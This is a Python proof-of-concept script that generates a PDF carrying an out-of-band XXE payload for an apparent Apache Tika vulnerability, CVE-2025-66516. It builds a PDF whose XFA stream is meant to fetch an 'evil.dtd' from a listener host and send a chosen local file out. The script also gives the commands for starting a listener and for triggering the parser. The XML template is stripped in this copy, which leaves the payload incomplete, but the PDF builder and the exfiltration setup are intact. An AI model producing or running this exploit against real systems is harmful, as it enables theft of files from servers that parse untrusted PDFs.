#!/usr/bin/env python3
"""
CVE-2025-66516 OOB XXE POC Generator
Out-of-band data exfiltration via HTTP

DISCLAIMER: This POC code is for educational purposes only.
Unauthorized use may violate laws.
"""

import sys


def build_oob_xfa_xml(listener_ip, listener_port, target_file):
    """Return the XFA XML text that build_pdf() embeds as the /XFA stream.

    Args:
        listener_ip: Host part of the listener URL.
        listener_port: Port part of the listener URL.
        target_file: Path the caller wants referenced by the template.

    Returns:
        The template string.

    NOTE(review): in this copy of the file the XML markup of the template
    appears to have been stripped -- only entity references remain, and
    neither ``dtd_url`` nor ``target_file`` is interpolated. The literal is
    left exactly as found; restore it from the authoritative copy of the
    script rather than guessing at the missing markup.
    """
    # URL of the external DTD served by the listener (currently unused, see
    # the note in the docstring).
    dtd_url = f"http://{listener_ip}:{listener_port}/evil.dtd"
    return f""" %dtd; ]> &send; """


def build_pdf(xfa_xml, out_path):
    """Write a minimal single-page PDF whose AcroForm references an XFA stream.

    Object layout:
        1 - document catalog (references Pages and AcroForm)
        2 - page tree with one page
        3 - the page itself (612x792 points)
        4 - AcroForm dictionary with /XFA pointing at object 5
        5 - stream holding ``xfa_xml`` encoded as UTF-8

    Args:
        xfa_xml: Text to store in the XFA stream.
        out_path: Destination path; the file is opened in binary write mode.

    Raises:
        OSError: If ``out_path`` cannot be opened or written.
    """
    # PDF header with version 1.7 and binary marker bytes.
    parts = [b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n"]
    # Running byte offset of the next chunk, maintained incrementally instead
    # of re-summing every part on each call.
    position = len(parts[0])
    # Object number -> byte offset of its "n 0 obj" header. Keyed by number so
    # the xref table can be emitted in object-number order regardless of the
    # order in which objects are written to the body.
    offsets = {}

    def add_obj(num, body):
        """Append object ``num`` with the given body bytes and record its offset."""
        nonlocal position
        chunk = f"{num} 0 obj\n".encode("ascii") + body + b"\nendobj\n"
        offsets[num] = position
        parts.append(chunk)
        position += len(chunk)

    add_obj(1, b"<< /Type /Catalog /Pages 2 0 R /AcroForm 4 0 R >>")
    add_obj(2, b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>")
    add_obj(
        3,
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Resources << >> >>",
    )

    x_bytes = xfa_xml.encode("utf-8")
    x_stream = (
        f"<< /Length {len(x_bytes)} >>\nstream\n".encode("ascii")
        + x_bytes
        + b"\nendstream"
    )
    # Object 5 is written before object 4; the xref table below compensates.
    add_obj(5, x_stream)
    add_obj(4, b"<< /NeedAppearances true /Fields [] /XFA 5 0 R >>")

    xref_start = position
    # Highest object number; objects 1..total are all defined above.
    total = max(offsets)

    parts.append(b"xref\n")
    # Subsection header: first object number 0, total + 1 entries.
    parts.append(f"0 {total + 1}\n".encode("ascii"))
    # Entry 0 is the head of the free list.
    parts.append(b"0000000000 65535 f \n")
    # Entries within a subsection describe consecutive object numbers, so they
    # must be emitted for 1..total in order, not in the order objects were
    # written.
    parts.extend(
        f"{offsets[num]:010d} 00000 n \n".encode("ascii")
        for num in range(1, total + 1)
    )
    parts.append(
        f"trailer\n<< /Size {total + 1} /Root 1 0 R >>\n"
        f"startxref\n{xref_start}\n%%EOF\n".encode("ascii")
    )

    with open(out_path, "wb") as f:
        f.write(b"".join(parts))


def main():
    """Generate the PDF from optional CLI arguments: [ip] [port] [target_file]."""
    listener_ip = "127.0.0.1"
    listener_port = 8888
    target_file = "/home/siddhartha/apache_tika_poc/fake-secrets.txt"

    if len(sys.argv) > 1:
        listener_ip = sys.argv[1]
    if len(sys.argv) > 2:
        listener_port = int(sys.argv[2])
    if len(sys.argv) > 3:
        target_file = sys.argv[3]

    xfa_xml = build_oob_xfa_xml(listener_ip, listener_port, target_file)
    build_pdf(xfa_xml, "cve-2025-66516_OOB_XXE.pdf")

    print("[+] Generated cve-2025-66516_OOB_XXE.pdf")
    print(f"[+] HTTP listener target: http://{listener_ip}:{listener_port}/")
    print(f"[+] Target file to exfiltrate: {target_file}")
    print(f"[+] Start listener: python3 http_listener.py {listener_port}")
    print("[+] Test: java -jar tika-app-3.2.1.jar -t cve-2025-66516_OOB_XXE.pdf")


if __name__ == "__main__":
    main()